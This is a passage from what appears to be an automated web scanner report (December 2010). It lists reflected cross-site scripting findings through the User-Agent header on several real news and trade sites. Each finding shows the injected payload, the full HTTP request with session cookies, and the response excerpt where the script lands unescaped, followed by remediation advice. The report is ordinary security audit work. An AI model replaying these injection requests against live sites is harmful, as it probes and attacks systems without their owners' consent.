Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blog/archives/evil_bytes/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)cee22"-alert(1)-"2fc9cff2b63
Connection: close
Cookie: s_lv=1292121547041; PHPSESSID=8efl2fv5lkgca0bau3me2u8bb0; s_nr=1292111961290; s_lv_s=Less%20than%201%20day; iwa_user_login_check=OGVmbDJmdjVsa2djYTBiYXUzbWUydThiYjA%3D;

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 03:27:15 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=OGVmbDJmdjVsa2djYTBiYXUzbWUydThiYjA%3D; expires=Sat, 11-Dec-2010 17:27:15 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 79717

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
<title></title>
...[SNIP]...
.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="blog";
s.prop6="";
s.prop7="";
s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)cee22"-alert(1)-"2fc9cff2b63";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop14="";
s.prop15="";
s.prop16="";
s.prop19="False";
s.prop21="";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
...[SNIP]...

3.43. http://www.gamasutra.com/jobs/event_board.php [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.gamasutra.com
Path:   /jobs/event_board.php

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29f17"-alert(1)-"5ac8323a095 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jobs/event_board.php HTTP/1.1
Host: www.gamasutra.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)29f17"-alert(1)-"5ac8323a095
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 03:26:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Connection: close
Content-Type: text/html
Content-Length: 86356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<script t
...[SNIP]...

   s.pageType="";
   s.prop1="";
   s.prop2="";
   s.prop3="Gamasustra | | ";
   s.prop4="";
   s.prop5="";
   s.prop6="";
   s.prop7="";
   s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)29f17"-alert(1)-"5ac8323a095";
   s.prop9="";
   s.prop10="";
   s.prop13="";
   /* Conversion Variables */
   s.campaign="";
   s.state="";
   s.zip="";
   s.events="event5";
   s.products="";
   s.purchaseID="";
   s.eVar1="";
   s.eVar2="";
   s.eVar3=
...[SNIP]...

3.44. http://www.internetevolution.com/author.asp [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.internetevolution.com
Path:   /author.asp

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e11a9"-alert(1)-"4d708df51b6 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /author.asp HTTP/1.1
Host: www.internetevolution.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)e11a9"-alert(1)-"4d708df51b6
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 03:32:26 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 586431
Set-Cookie: piddlAnonUserID=15532673; expires=Sun, 12-Dec-2010 05:00:00 GMT; path=/
Set-Cookie: internetevolution%5Flastvisit=12%2F11%2F2010+10%3A32%3A21+PM; expires=Tue, 11-Dec-2035 05:00:00 GMT; path=/
Set-Cookie: internetevolution%5Fvisits=1; expires=Tue, 11-Dec-2035 05:00:00 GMT; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<META name="keywords" content="Digital content & entertainment, Enterprise IT, Personalization & privacy, Terrorism, Sec
...[SNIP]...
;
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)e11a9"-alert(1)-"4d708df51b6";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="";
s.prop15="";
s.prop16="";
s.prop19="False";
s.prop20="";

/* E-commerce Variables */
s.campaign="";
s.state
...[SNIP]...

3.45. http://www.lightreading.com/ad_redirect.asp [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lightreading.com
Path:   /ad_redirect.asp

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f5fd"-alert(1)-"814dc640d93 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad_redirect.asp HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)4f5fd"-alert(1)-"814dc640d93
Connection: close
Cookie: lightreading%5Fvisits=2; s_cc=true; _bizo_cksm_crc32=3AF13A5B; s_sq=%5B%5BB%5D%5D; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM; seen=true;

Response (redirected)

HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 03:34:52 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 262956
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence
...[SNIP]...
;
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)4f5fd"-alert(1)-"814dc640d93";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="";
s.prop15="";
s.prop16="";
s.prop19="False";
s.prop20="";

/* E-commerce Variables */
s.campaign="";
s.state
...[SNIP]...

3.46. http://www.lightreading.com/archives.asp [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lightreading.com
Path:   /archives.asp

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82ede"-alert(1)-"abf41aca818 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /archives.asp HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)82ede"-alert(1)-"abf41aca818
Connection: close
Cookie: lightreading%5Fvisits=2; s_cc=true; _bizo_cksm_crc32=3AF13A5B; s_sq=%5B%5BB%5D%5D; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM; seen=true;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 03:33:56 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Last-modified: Sun, 12 Dec 2010 02:33:56 GMT
Expires: Sun, 10 Apr 2011 22:33:56 GMT
Etag: s200805.p200805
Content-Length: 177610
Cache-control: max-age=10368000, public

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence
...[SNIP]...
;
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)82ede"-alert(1)-"abf41aca818";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="";
s.prop15="";
s.prop16="";
s.prop19="False";
s.prop20="";

/* E-commerce Variables */
s.campaign="";
s.state
...[SNIP]...

3.47. http://www.lightreading.com/blog.asp [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lightreading.com
Path:   /blog.asp

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5bee7"-alert(1)-"e9001f173b was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blog.asp HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)5bee7"-alert(1)-"e9001f173b
Connection: close
Cookie: lightreading%5Fvisits=2; s_cc=true; _bizo_cksm_crc32=3AF13A5B; s_sq=%5B%5BB%5D%5D; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM; seen=true;

Response (redirected)

HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 03:33:03 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 259290
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence
...[SNIP]...
;
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)5bee7"-alert(1)-"e9001f173b";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="";
s.prop15="";
s.prop16="";
s.prop19="False";
s.prop20="";

/* E-commerce Variables */
s.campaign="";
s.state
...[SNIP]...

3.48. http://www.lightreading.com/calendar_webinars.asp [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lightreading.com
Path:   /calendar_webinars.asp

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92853"-alert(1)-"4250cf79b83 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /calendar_webinars.asp HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)92853"-alert(1)-"4250cf79b83
Connection: close
Cookie: lightreading%5Fvisits=2; s_cc=true; _bizo_cksm_crc32=3AF13A5B; s_sq=%5B%5BB%5D%5D; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM; seen=true;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 03:34:18 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 236362
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence
...[SNIP]...
;
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)92853"-alert(1)-"4250cf79b83";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="";
s.prop15="";
s.prop16="";
s.prop19="False";
s.prop20="";

/* E-commerce Variables */
s.campaign="";
s.state
...[SNIP]...

3.49. http://www.lightreading.com/document.asp [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lightreading.com
Path:   /document.asp

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 595f9"-alert(1)-"50c00a44cf7 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /document.asp HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)595f9"-alert(1)-"50c00a44cf7
Connection: close
Cookie: lightreading%5Fvisits=2; s_cc=true; _bizo_cksm_crc32=3AF13A5B; s_sq=%5B%5BB%5D%5D; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM; seen=true;

Response (redirected)

HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 03:35:06 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 262944
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence
...[SNIP]...
;
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)595f9"-alert(1)-"50c00a44cf7";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="";
s.prop15="";
s.prop16="";
s.prop19="False";
s.prop20="";

/* E-commerce Variables */
s.campaign="";
s.state
...[SNIP]...

3.50. http://www.lightreading.com/email.asp [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lightreading.com
Path:   /email.asp

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5ca9"-alert(1)-"fbb394b7112 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /email.asp HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)a5ca9"-alert(1)-"fbb394b7112
Connection: close
Cookie: lightreading%5Fvisits=2; s_cc=true; _bizo_cksm_crc32=3AF13A5B; s_sq=%5B%5BB%5D%5D; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM; seen=true;

Response (redirected)

HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 03:34:33 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 263005
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence
...[SNIP]...
;
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)a5ca9"-alert(1)-"fbb394b7112";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="";
s.prop15="";
s.prop16="";
s.prop19="False";
s.prop20="";

/* E-commerce Variables */
s.campaign="";
s.state
...[SNIP]...

3.51. http://www.lightreading.com/lg_redirect.asp [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lightreading.com
Path:   /lg_redirect.asp

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32da6"-alert(1)-"059e87707bb was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /lg_redirect.asp HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)32da6"-alert(1)-"059e87707bb
Connection: close
Cookie: lightreading%5Fvisits=2; s_cc=true; _bizo_cksm_crc32=3AF13A5B; s_sq=%5B%5BB%5D%5D; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM; seen=true;

Response (redirected)

HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 03:35:53 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 265674
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence
...[SNIP]...
;
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)32da6"-alert(1)-"059e87707bb";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="";
s.prop15="";
s.prop16="";
s.prop19="False";
s.prop20="";

/* E-commerce Variables */
s.campaign="";
s.state
...[SNIP]...

3.52. http://www.lightreading.com/live/event_information.asp [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lightreading.com
Path:   /live/event_information.asp

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd0c0"-alert(1)-"82a792f16f6 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live/event_information.asp HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)bd0c0"-alert(1)-"82a792f16f6
Connection: close
Cookie: lightreading%5Fvisits=2; s_cc=true; _bizo_cksm_crc32=3AF13A5B; s_sq=%5B%5BB%5D%5D; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM; seen=true;

Response (redirected)

HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 03:34:05 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 179152
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence
...[SNIP]...
;
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)bd0c0"-alert(1)-"82a792f16f6";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="";
s.prop15="";
s.prop16="";
s.prop19="False";
s.prop20="";

/* E-commerce Variables */
s.campaign="";
s.state
...[SNIP]...

3.53. http://www.lightreading.com/login.asp [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lightreading.com
Path:   /login.asp

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6bce1"-alert(1)-"4de0853dca9 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /login.asp HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)6bce1"-alert(1)-"4de0853dca9
Connection: close
Cookie: lightreading%5Fvisits=2; s_cc=true; _bizo_cksm_crc32=3AF13A5B; s_sq=%5B%5BB%5D%5D; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM; seen=true;

Response (redirected)

HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 03:34:08 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 172963
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence
...[SNIP]...
;
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)6bce1"-alert(1)-"4de0853dca9";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="";
s.prop15="";
s.prop16="";
s.prop19="False";
s.prop20="";

/* E-commerce Variables */
s.campaign="";
s.state
...[SNIP]...

3.54. http://www.lightreading.com/message.asp [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lightreading.com
Path:   /message.asp

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b66e1"-alert(1)-"e3512dd6779 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

